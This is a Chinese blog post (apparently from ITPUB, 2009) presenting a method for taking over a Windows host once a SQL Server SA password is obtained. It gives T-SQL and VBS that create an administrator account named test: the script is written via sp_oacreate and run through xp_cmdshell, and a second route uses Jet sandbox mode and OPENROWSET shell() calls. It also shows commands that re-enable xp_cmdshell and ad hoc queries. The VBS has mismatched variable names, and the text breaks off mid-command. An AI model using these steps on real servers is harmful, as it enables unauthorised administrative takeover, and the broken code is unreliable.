SQL Server SA許可權最新入侵方法

iSQlServer發表於2009-02-05
在獲得SA密碼後,往往因為伺服器管理者或”前人”將net.exe和net1.exe被限制使用,無法新增管理員賬號。我們知道VBS在活動目錄(ADSI)部分有一個winnt物件,用來管理本地資源,利用它可以不依靠CMD等命令就能新增一個管理員,具體程式碼如下:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")

os="WinNT://"&wsnetwork.ComputerName

Set b=GetObject(os) '得到adsi介面,繫結

Set e=GetObject(os&"/Administrators,group") '屬性,admin組

Set d=ob.Create("user","test") '建立使用者

od.SetPassword "1234" '設定密碼

od.SetInfo '儲存

Set f=GetObject(os&"/test",user) '得到使用者

oe.add os&"/test"

將上面的程式碼儲存為1.vbs,然後執行,命令為“cscript. 1.vbs”,這樣就會在系統新增一個系統名為test,密碼為1234的使用者。具體在查詢分析器執行的程式碼如下:

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject

("WSCRIPT.NETWORK")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.

ComputerName'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set b=GetObject(os)'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set e=GetObject

(os&"/Administrators,group")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set d=ob.Create

("user","test")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set f=GetObject

(os&"/test",user) '

exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'

執行完上面的語句,再執行下面這行程式碼,這行程式碼一定單獨執行,不要與上面的放在一起執行,否則會提示“c:\1.vbs正被另一個程式執行”而無法成功新增使用者:

exec master..xp_cmdshell 'cscript. c:\1.vbs'

如果系統使用者沒有新增成功,有可能是因為系統使用者的密碼1234的太簡單,不符合伺服器的複雜密碼策略,可以考慮設定的複雜些,然後再測試一下。也可以使用echo將程式碼寫到1.vbs中,程式碼格式為:

exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")

>>1.vbs'

不過,不知道為什麼所有帶“&”字元的命令列都無法寫入1.vbs,感興趣的朋友可以嘗試解決一下。

使用jet沙盤模式,可以解決XP_cmdshell等儲存過程和相關動態連結庫帶來的煩惱。出於安全原因,系統預設情況下沙盤模式未開啟,這就需要xp_regwrite開啟沙盤模式:

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0

\Engines','SandBoxMode','REG_DWORD',1

然後執行沙盤命令,在系統新增一個使用者名稱為test,密碼為1234的使用者:

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows

\system32\ias\ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows

\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup

administrators test /add")')

不同的作業系統,路徑也不一樣,需要根據情況做修改:

NT/2K: c:\winnt\system32\

XP/2003: c:\windows\system32\

另外Microsoft SQL Server2005在預設情況下,一些儲存過程是關閉著的,需要命令開啟:

開啟XP_cmdshell:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure

'xp_cmdshell', 1;RECONFIGURE;

開啟'OPENROWSET':

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure

'Ad Hoc Distributed Queries',1;RECONFIGURE;

開啟'sp_oacreate':

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/16436858/viewspace-545383/,如需轉載,請註明出處,否則將追究法律責任。

相關文章